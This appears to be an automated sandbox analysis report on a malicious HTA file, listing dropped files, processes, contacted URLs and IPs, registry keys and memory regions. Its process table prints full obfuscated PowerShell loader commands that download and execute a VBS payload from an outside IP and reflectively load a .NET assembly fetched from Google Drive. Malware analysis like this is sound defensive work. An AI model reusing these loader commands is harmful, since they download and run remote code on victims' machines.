Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
greatthingswithmegood.hta
|
HTML document, ASCII text, with very long lines (65536), with no line terminators
|
initial sample
|
||
C:\Users\user\AppData\Local\Temp\ly0yjdqb\ly0yjdqb.cmdline
|
Unicode text, UTF-8 (with BOM) text, with very long lines (368), with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\seemethebestthingswithgreatneedswithgo.vbs
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\seemethebestthingswithgreatneedswithgoodformewith[1].tiff
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\RES2C04.tmp
|
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x492, 9 symbols, created Wed Oct 30 08:53:37 2024,
1st section name ".debug$S"
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3naoor5k.5yp.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3uedb00j.rtm.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5iobkwo4.heg.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ew0gpcgm.twz.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ivn5hzdv.akk.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k3lnxuof.jm1.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nixedkto.5sj.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pljapn4x.hno.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tcmxgj35.r32.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w5mmzdje.0bl.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\ly0yjdqb\CSC746F8121F2314519843BE09F69B09E4D.TMP
|
MSVC .res
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\ly0yjdqb\ly0yjdqb.0.cs
|
C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (365)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\ly0yjdqb\ly0yjdqb.dll
|
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\ly0yjdqb\ly0yjdqb.out
|
Unicode text, UTF-8 (with BOM) text, with very long lines (449), with CRLF, CR line terminators
|
modified
|
There are 10 hidden files, click here to show them.
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Windows\SysWOW64\mshta.exe
|
mshta.exe "C:\Users\user\Desktop\greatthingswithmegood.hta"
|
||
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\sYSTEM32\windOWSPowerShell\V1.0\POWeRSHell.eXE" "poweRSheLl.EXe -eX
byPASS -noP -W 1
-c dEVicECREdeNtiaLDePlOymenT ;
Iex($(IEX('[sYstEm.tExT.enCOding]'+[char]0X3a+[char]0x3A+'UtF8.GETStRIng([sySTEM.convERt]'+[CHAR]58+[CHar]58+'fRoMbase64STriNg('+[Char]0x22+'JFZENmI1TUtGICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC10eVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFRmlOSXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTW9uLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtHRENPeUFFdkgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd3Esc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZkhuSk9PQWdhTCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZmNMV0JuWCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiS2cpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ3TnZtcExmRlp2IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lU1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0cU9kWVBRUCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkVkQ2YjVNS0Y6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTguNDYuMTc4LjE1MS82Ni9zZWVtZXRoZWJlc3R0aGluZ3N3aXRoZ3JlYXRuZWVkc3dpdGhnb29kZm9ybWV3aXRoLnRJRiIsIiRFTnY6QVBQREFUQVxzZWVtZXRoZWJlc3R0aGluZ3N3aXRoZ3JlYXRuZWVkc3dpdGhnby52YnMiLDAsMCk7c3RBcnQtU2xFZXAoMyk7c1RBUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOdjpBUFBEQVRBXHNlZW1ldGhlYmVzdHRoaW5nc3dpdGhncmVhdG5lZWRzd2l0aGdvLnZicyI='+[cHAr]34+'))')))"
|
||
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX byPASS -noP -W 1 -c dEVicECREdeNtiaLDePlOymenT
|
||
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ly0yjdqb\ly0yjdqb.cmdline"
|
||
C:\Windows\SysWOW64\wscript.exe
|
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemethebestthingswithgreatneedswithgo.vbs"
|
||
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRTSEVMbGlkWzFdKyRzaEVsbElkWzEzXSsnWCcpICgoJ2p2TWltYWdlVXJsID0gdUNiaHR0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dXIgdUNiO2p2TXdlYkNsaWVudCA9IE5ldy1PYmplYycrJ3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7anZNaW1hZ2VCJysneXRlJysncyA9IGp2TXdlYkNsaWVudC5Eb3dubG9hZERhJysndGEoanZNaW1hZ2VVcmwpO2p2TWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKGp2TWltYWdlQnl0ZXMpO2p2TXN0YXJ0RmxhZyA9IHVDYjw8QkFTRTY0X1NUQVJUPj51Q2I7anZNZW5kJysnRmxhZyA9IHVDYjw8QkFTRTY0X0VORD4+dUNiO2p2TXN0YXJ0SW5kZXggPSBqdk1pbWFnZVRleHQuSW5kZXhPZihqdk1zdGFydEZsYWcpO2p2TWVuZEluZGV4ID0ganZNaW1hZ2VUZXh0JysnLkluZGV4T2YnKycoanZNZW5kRmxhZyk7anZNc3RhcnRJbmRleCAtZ2UgMCAtYW5kIGp2TWVuZEluZGV4IC1ndCBqdk1zdGFydEluZGV4O2p2TXN0YXJ0SW5kZXggKz0ganZNc3RhcnRGbGFnLkxlbmd0aDtqdk1iYXNlNjRMZW5ndGggPSBqdk1lbmRJJysnbmRleCAtIGp2TXN0YXJ0SW5kZScrJ3g7anZNYmFzZTY0Q29tbWFuZCA9IGp2TWltYWdlVGV4dC5TdWJzdHJpbmcoanZNc3RhcnRJbmRleCwganZNYmFzZTY0TGVuZ3RoKTtqdk0nKydiYXNlNjRSZXZlcnNlZCA9IC1qb2luIChqdk1iYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCcrJykgbnJFIEZvckVhJysnY2gtT2JqZWN0IHsganZNXyB9KVstMS4uLShqdk1iYXNlNjRDb21tYW5kLkxlbmd0aCldO2p2TWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoanZNYmFzZTY0UmV2ZXJzZWQpO2p2TWxvYWRlZEFzc2VtYmx5ICcrJz0gW1N5Jysnc3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChqdk1jb21tYW5kQnl0ZXMpO2p2TXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXScrJy5HZXRNZXRob2QnKycodUNiVkFJdUNiKTtqdk12YWlNZXRob2QuSW52b2tlKGp2TW51bGwsIEAodUNidHh0LicrJ0dST0wnKydMLzY2LzE1MS44NzEuNjQuODkxLycrJy86cHR0aHVDJysnYiwgdUNiZGVzYXRpdmFkb3VDYiwgdUNiZGVzYScrJ3RpdmFkb3VDYiwgdUNiZGVzYXRpdmFkb3VDYicrJywgdUNiYXNwbicrJ2UnKyd0X3JlZ2Jyb3dzZXJzdUNiLCB1Q2JkZXNhdGl2YWRvdUNiLCB1Q2JkZXNhdGl2YWRvdUNiLHVDYmRlc2F0aXZhZG91Q2IsdUNiZGVzYXRpdmFkb3VDYix1Q2JkZXNhdGl2YWRvdUNiLHVDYmRlc2F0aXZhZG91Q2IsdUNiZGVzYScrJ3RpdmFkb3VDYix1Q2IxdUNiLHVDYmRlc2F0aXZhZG91Q2IpKTsnKS5SZXBsQWNlKCdqdk0nLCckJykuUmVwbEFjZSgndUNiJyxbc1RyaW5HXVtjaGFSXTM5KS5SZXBsQWNlKChbY2hhUl0xMTArW2NoYVJdMTE0K1tjaGFSXTY5KSxbc1RyaW5HXVtjaGFSXTEyNCkp';$OWjuxd
= [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy
bypass -NoProfile -command $OWjuxD
|
||
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command
"& ( $SHELlid[1]+$shEllId[13]+'X') (('jvMimageUrl = uCbhttps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur
uCb;jvMwebClient = New-Objec'+'t System.Net.WebClient;jvMimageB'+'yte'+'s = jvMwebClient.DownloadDa'+'ta(jvMimageUrl);jvMimageText
= [System.Text.Encoding]::UTF8.GetString(jvMimageBytes);jvMstartFlag = uCb<<BASE64_START>>uCb;jvMend'+'Flag = uCb<<BASE64_END>>uCb;jvMstartIndex
= jvMimageText.IndexOf(jvMstartFlag);jvMendIndex = jvMimageText'+'.IndexOf'+'(jvMendFlag);jvMstartIndex -ge 0 -and jvMendIndex
-gt jvMstartIndex;jvMstartIndex += jvMstartFlag.Length;jvMbase64Length = jvMendI'+'ndex - jvMstartInde'+'x;jvMbase64Command
= jvMimageText.Substring(jvMstartIndex, jvMbase64Length);jvM'+'base64Reversed = -join (jvMbase64Command.ToCharArray('+') nrE
ForEa'+'ch-Object { jvM_ })[-1..-(jvMbase64Command.Length)];jvMcommandBytes = [System.Convert]::FromBase64String(jvMbase64Reversed);jvMloadedAssembly
'+'= [Sy'+'stem.Reflection.Assembly]::Load(jvMcommandBytes);jvMvaiMethod = [dnlib.IO.Home]'+'.GetMethod'+'(uCbVAIuCb);jvMvaiMethod.Invoke(jvMnull,
@(uCbtxt.'+'GROL'+'L/66/151.871.64.891/'+'/:ptthuC'+'b, uCbdesativadouCb, uCbdesa'+'tivadouCb, uCbdesativadouCb'+', uCbaspn'+'e'+'t_regbrowsersuCb,
uCbdesativadouCb, uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesa'+'tivadouCb,uCb1uCb,uCbdesativadouCb));').ReplAce('jvM','$').ReplAce('uCb',[sTrinG][chaR]39).ReplAce(([chaR]110+[chaR]114+[chaR]69),[sTrinG][chaR]124))"
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2C04.tmp"
"c:\Users\user\AppData\Local\Temp\ly0yjdqb\CSC746F8121F2314519843BE09F69B09E4D.TMP"
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
http://198.46.178.151/66/seemethebestthingswithgreatneedswithgoodformewith.tIF
|
198.46.178.151
|
||
https://drive.google.com
|
unknown
|
||
https://drive.usercontent.googleXb2
|
unknown
|
||
http://nuget.org/NuGet.exe
|
unknown
|
||
https://aka.ms/winsvr-2022-pshelp
|
unknown
|
||
http://crl.micro
|
unknown
|
||
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
http://schemas.xmlsoap.org/soap/encoding/
|
unknown
|
||
https://aka.ms/pscore6lB
|
unknown
|
||
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
https://go.micro
|
unknown
|
||
http://198.46.178.151/66/seemethebestthingswithgreatneedswithgoodformewith.tIF&
|
unknown
|
||
http://crl.micMt
|
unknown
|
||
http://schemas.xmlsoap.org/wsdl/
|
unknown
|
||
https://contoso.com/
|
unknown
|
||
https://nuget.org/nuget.exe
|
unknown
|
||
https://contoso.com/License
|
unknown
|
||
https://contoso.com/Icon
|
unknown
|
||
https://drive.usercontent.google.com
|
unknown
|
||
http://198.46.178.151/66/seemethebestthingswithgreatneedswithgoodformewith.tIFb.2l
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
http://go.micros
|
unknown
|
||
https://github.com/Pester/Pester
|
unknown
|
There are 13 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
drive.google.com
|
142.250.185.206
|
||
198.187.3.20.in-addr.arpa
|
unknown
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
198.46.178.151
|
unknown
|
United States
|
||
142.250.185.206
|
drive.google.com
|
United States
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
LangID
|
||
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\System32\WScript.exe.FriendlyAppName
|
||
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\System32\WScript.exe.ApplicationCompany
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 8 hidden registries, click here to show them.
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
53B3000
|
trusted library allocation
|
page read and write
|
||
6E80000
|
heap
|
page execute and read and write
|
||
4E29000
|
heap
|
page read and write
|
||
6183000
|
heap
|
page read and write
|
||
7300000
|
trusted library allocation
|
page read and write
|
||
5438000
|
trusted library allocation
|
page read and write
|
||
48C9000
|
trusted library allocation
|
page read and write
|
||
7990000
|
trusted library allocation
|
page read and write
|
||
29F7000
|
heap
|
page read and write
|
||
3040000
|
heap
|
page readonly
|
||
8FD000
|
heap
|
page read and write
|
||
297E000
|
heap
|
page read and write
|
||
705E000
|
stack
|
page read and write
|
||
2A2A000
|
heap
|
page read and write
|
||
830000
|
heap
|
page read and write
|
||
72C8000
|
heap
|
page read and write
|
||
7FB30000
|
trusted library allocation
|
page execute and read and write
|
||
4EAB000
|
heap
|
page read and write
|
||
594D000
|
heap
|
page read and write
|
||
5663000
|
heap
|
page read and write
|
||
8FD000
|
heap
|
page read and write
|
||
5DA8000
|
trusted library allocation
|
page read and write
|
||
6190000
|
heap
|
page read and write
|
||
5050000
|
heap
|
page execute and read and write
|
||
8330000
|
trusted library allocation
|
page execute and read and write
|
||
847000
|
heap
|
page read and write
|
||
6167000
|
heap
|
page read and write
|
||
2C7E000
|
stack
|
page read and write
|
||
29F3000
|
heap
|
page read and write
|
||
4240000
|
trusted library allocation
|
page read and write
|
||
7960000
|
trusted library allocation
|
page read and write
|
||
729B000
|
stack
|
page read and write
|
||
5F50000
|
trusted library allocation
|
page read and write
|
||
857000
|
heap
|
page read and write
|
||
4BA5000
|
heap
|
page execute and read and write
|
||
85C000
|
heap
|
page read and write
|
||
8BF0000
|
trusted library allocation
|
page read and write
|
||
4BA0000
|
heap
|
page execute and read and write
|
||
79A0000
|
trusted library allocation
|
page read and write
|
||
423D000
|
trusted library allocation
|
page execute and read and write
|
||
6195000
|
heap
|
page read and write
|
||
7780000
|
trusted library allocation
|
page read and write
|
||
618B000
|
heap
|
page read and write
|
||
7047000
|
heap
|
page read and write
|
||
5901000
|
heap
|
page read and write
|
||
616B000
|
heap
|
page read and write
|
||
2A82000
|
heap
|
page read and write
|
||
D70000
|
heap
|
page read and write
|
||
6169000
|
heap
|
page read and write
|
||
33C9000
|
heap
|
page read and write
|
||
738F000
|
stack
|
page read and write
|
||
50CE000
|
stack
|
page read and write
|
||
48B0000
|
trusted library allocation
|
page read and write
|
||
6177000
|
heap
|
page read and write
|
||
759D000
|
stack
|
page read and write
|
||
6177000
|
heap
|
page read and write
|
||
782000
|
direct allocation
|
page read and write
|
||
6143000
|
heap
|
page read and write
|
||
509B000
|
stack
|
page read and write
|
||
4DA3000
|
heap
|
page read and write
|
||
4260000
|
trusted library allocation
|
page read and write
|
||
6BDB000
|
stack
|
page read and write
|
||
2BEE000
|
stack
|
page read and write
|
||
6144000
|
heap
|
page read and write
|
||
7810000
|
trusted library allocation
|
page read and write
|
||
803000
|
heap
|
page read and write
|
||
4B67000
|
trusted library allocation
|
page read and write
|
||
47E0000
|
heap
|
page read and write
|
||
2A2A000
|
heap
|
page read and write
|
||
6183000
|
heap
|
page read and write
|
||
5BD1000
|
heap
|
page read and write
|
||
85C000
|
heap
|
page read and write
|
||
2CBE000
|
stack
|
page read and write
|
||
73D0000
|
heap
|
page read and write
|
||
594A000
|
heap
|
page read and write
|
||
4FBE000
|
stack
|
page read and write
|
||
6183000
|
heap
|
page read and write
|
||
6111000
|
heap
|
page read and write
|
||
5658000
|
heap
|
page read and write
|
||
2FE0000
|
heap
|
page read and write
|
||
72D0000
|
trusted library allocation
|
page read and write
|
||
8624000
|
heap
|
page read and write
|
||
562F000
|
heap
|
page read and write
|
||
5881000
|
trusted library allocation
|
page read and write
|
||
2FB0000
|
trusted library allocation
|
page read and write
|
||
4720000
|
trusted library allocation
|
page execute and read and write
|
||
617C000
|
heap
|
page read and write
|
||
3072000
|
trusted library allocation
|
page read and write
|
||
72FC000
|
heap
|
page read and write
|
||
5C2A000
|
heap
|
page read and write
|
||
6195000
|
heap
|
page read and write
|
||
6205000
|
trusted library allocation
|
page read and write
|
||
659E000
|
stack
|
page read and write
|
||
5BD1000
|
heap
|
page read and write
|
||
8FD000
|
heap
|
page read and write
|
||
6162000
|
heap
|
page read and write
|
||
47FF000
|
trusted library allocation
|
page read and write
|
||
8170000
|
heap
|
page read and write
|
||
6061000
|
trusted library allocation
|
page read and write
|
||
42CE000
|
stack
|
page read and write
|
||
42D0000
|
heap
|
page read and write
|
||
2A90000
|
heap
|
page read and write
|
||
8657000
|
heap
|
page read and write
|
||
4DA0000
|
heap
|
page read and write
|
||
2A82000
|
heap
|
page read and write
|
||
3075000
|
trusted library allocation
|
page execute and read and write
|
||
6C5C000
|
stack
|
page read and write
|
||
6159000
|
heap
|
page read and write
|
||
6080000
|
heap
|
page read and write
|
||
5A2F000
|
trusted library allocation
|
page read and write
|
||
71DD000
|
stack
|
page read and write
|
||
482F000
|
heap
|
page read and write
|
||
778D000
|
trusted library allocation
|
page read and write
|
||
29E1000
|
heap
|
page read and write
|
||
4790000
|
heap
|
page execute and read and write
|
||
5656000
|
heap
|
page read and write
|
||
4DE8000
|
heap
|
page read and write
|
||
5899000
|
heap
|
page read and write
|
||
2FA3000
|
trusted library allocation
|
page execute and read and write
|
||
8490000
|
heap
|
page read and write
|
||
73F9000
|
heap
|
page read and write
|
||
851000
|
heap
|
page read and write
|
||
27A0000
|
heap
|
page read and write
|
||
6179000
|
heap
|
page read and write
|
||
618B000
|
heap
|
page read and write
|
||
732B000
|
heap
|
page read and write
|
||
615A000
|
heap
|
page read and write
|
||
7660000
|
trusted library allocation
|
page read and write
|
||
85B1000
|
trusted library allocation
|
page read and write
|
||
4DE8000
|
heap
|
page read and write
|
||
7337000
|
heap
|
page read and write
|
||
164E000
|
stack
|
page read and write
|
||
77F0000
|
trusted library allocation
|
page read and write
|
||
5C26000
|
heap
|
page read and write
|
||
4249000
|
trusted library allocation
|
page read and write
|
||
2A82000
|
heap
|
page read and write
|
||
5FD0000
|
heap
|
page read and write
|
||
616B000
|
heap
|
page read and write
|
||
2855000
|
heap
|
page read and write
|
||
4DB0000
|
heap
|
page read and write
|
||
464E000
|
stack
|
page read and write
|
||
780000
|
direct allocation
|
page read and write
|
||
2AA8000
|
heap
|
page read and write
|
||
2FCA000
|
trusted library allocation
|
page execute and read and write
|
||
49B7000
|
trusted library allocation
|
page read and write
|
||
8040000
|
trusted library allocation
|
page execute and read and write
|
||
7342000
|
heap
|
page read and write
|
||
861F000
|
heap
|
page read and write
|
||
617C000
|
heap
|
page read and write
|
||
47F1000
|
trusted library allocation
|
page read and write
|
||
618B000
|
heap
|
page read and write
|
||
6A5E000
|
stack
|
page read and write
|
||
56C6000
|
heap
|
page read and write
|
||
2FA0000
|
trusted library allocation
|
page read and write
|
||
5871000
|
trusted library allocation
|
page read and write
|
||
8F1000
|
heap
|
page read and write
|
||
8250000
|
trusted library allocation
|
page read and write
|
||
6BDE000
|
stack
|
page read and write
|
||
79C0000
|
trusted library allocation
|
page read and write
|
||
815A000
|
heap
|
page read and write
|
||
6539000
|
trusted library allocation
|
page read and write
|
||
48BC000
|
trusted library allocation
|
page read and write
|
||
7D00000
|
heap
|
page read and write
|
||
2BD8000
|
heap
|
page read and write
|
||
8E7000
|
heap
|
page read and write
|
||
3070000
|
trusted library allocation
|
page read and write
|
||
51F8000
|
trusted library allocation
|
page read and write
|
||
2A82000
|
heap
|
page read and write
|
||
4FB2000
|
trusted library allocation
|
page read and write
|
||
6143000
|
heap
|
page read and write
|
||
591B000
|
heap
|
page read and write
|
||
705E000
|
stack
|
page read and write
|
||
565B000
|
heap
|
page read and write
|
||
6143000
|
heap
|
page read and write
|
||
7620000
|
trusted library allocation
|
page read and write
|
||
5935000
|
heap
|
page read and write
|
||
76E9000
|
heap
|
page read and write
|
||
2A01000
|
heap
|
page read and write
|
||
2A43000
|
heap
|
page read and write
|
||
2A56000
|
heap
|
page read and write
|
||
880E000
|
stack
|
page read and write
|
||
7485000
|
heap
|
page read and write
|
||
3059000
|
trusted library allocation
|
page read and write
|
||
3168000
|
heap
|
page read and write
|
||
7033000
|
heap
|
page read and write
|
||
2D3C000
|
heap
|
page read and write
|
||
918000
|
heap
|
page read and write
|
||
6B1E000
|
stack
|
page read and write
|
||
8ED000
|
heap
|
page read and write
|
||
2AA5000
|
heap
|
page read and write
|
||
74A6000
|
heap
|
page read and write
|
||
586A000
|
heap
|
page read and write
|
||
60A8000
|
heap
|
page read and write
|
||
4DB4000
|
heap
|
page read and write
|
||
29F3000
|
heap
|
page read and write
|
||
5EE5000
|
trusted library allocation
|
page read and write
|
||
595D000
|
heap
|
page read and write
|
||
88E000
|
heap
|
page read and write
|
||
4DE8000
|
heap
|
page read and write
|
||
29F7000
|
heap
|
page read and write
|
||
6166000
|
heap
|
page read and write
|
||
2A3E000
|
heap
|
page read and write
|
||
77D0000
|
trusted library allocation
|
page read and write
|
||
4589000
|
trusted library allocation
|
page read and write
|
||
6DA0000
|
trusted library allocation
|
page execute and read and write
|
||
7552000
|
trusted library allocation
|
page read and write
|
||
5A20000
|
trusted library allocation
|
page read and write
|
||
775C000
|
heap
|
page read and write
|
||
723D000
|
stack
|
page read and write
|
||
854000
|
heap
|
page read and write
|
||
6195000
|
heap
|
page read and write
|
||
5541000
|
trusted library allocation
|
page read and write
|
||
617E000
|
heap
|
page read and write
|
||
30E0000
|
heap
|
page readonly
|
||
5873000
|
trusted library allocation
|
page read and write
|
||
71BF000
|
stack
|
page read and write
|
||
918000
|
heap
|
page read and write
|
||
49F7000
|
heap
|
page read and write
|
||
2A3A000
|
heap
|
page read and write
|
||
884F000
|
stack
|
page read and write
|
||
769E000
|
stack
|
page read and write
|
||
5C2D000
|
heap
|
page read and write
|
||
617C000
|
heap
|
page read and write
|
||
8615000
|
trusted library allocation
|
page read and write
|
||
4ECF000
|
heap
|
page read and write
|
||
711E000
|
stack
|
page read and write
|
||
6183000
|
heap
|
page read and write
|
||
783E000
|
stack
|
page read and write
|
||
29F0000
|
heap
|
page read and write
|
||
4660000
|
heap
|
page readonly
|
||
7240000
|
trusted library allocation
|
page read and write
|
||
73D4000
|
heap
|
page read and write
|
||
77DE000
|
stack
|
page read and write
|
||
6162000
|
heap
|
page read and write
|
||
5FF0000
|
trusted library allocation
|
page read and write
|
||
6FEB000
|
heap
|
page read and write
|
||
589C000
|
heap
|
page read and write
|
||
8154000
|
heap
|
page read and write
|
||
85C0000
|
heap
|
page read and write
|
||
7290000
|
trusted library allocation
|
page read and write
|
||
471D000
|
stack
|
page read and write
|
||
4826000
|
heap
|
page read and write
|
||
751E000
|
stack
|
page read and write
|
||
D6E000
|
direct allocation
|
page read and write
|
||
178F000
|
stack
|
page read and write
|
||
7240000
|
heap
|
page execute and read and write
|
||
2860000
|
heap
|
page read and write
|
||
2FE5000
|
heap
|
page read and write
|
||
5BD0000
|
heap
|
page read and write
|
||
84B0000
|
trusted library allocation
|
page read and write
|
||
5783000
|
heap
|
page read and write
|
||
594A000
|
heap
|
page read and write
|
||
6EAA000
|
stack
|
page read and write
|
||
7910000
|
trusted library allocation
|
page execute and read and write
|
||
8E7000
|
heap
|
page read and write
|
||
923000
|
heap
|
page read and write
|
||
69DB000
|
stack
|
page read and write
|
||
6171000
|
heap
|
page read and write
|
||
8060000
|
heap
|
page read and write
|
||
833000
|
heap
|
page read and write
|
||
2F50000
|
heap
|
page read and write
|
||
499E000
|
stack
|
page read and write
|
||
3122000
|
heap
|
page read and write
|
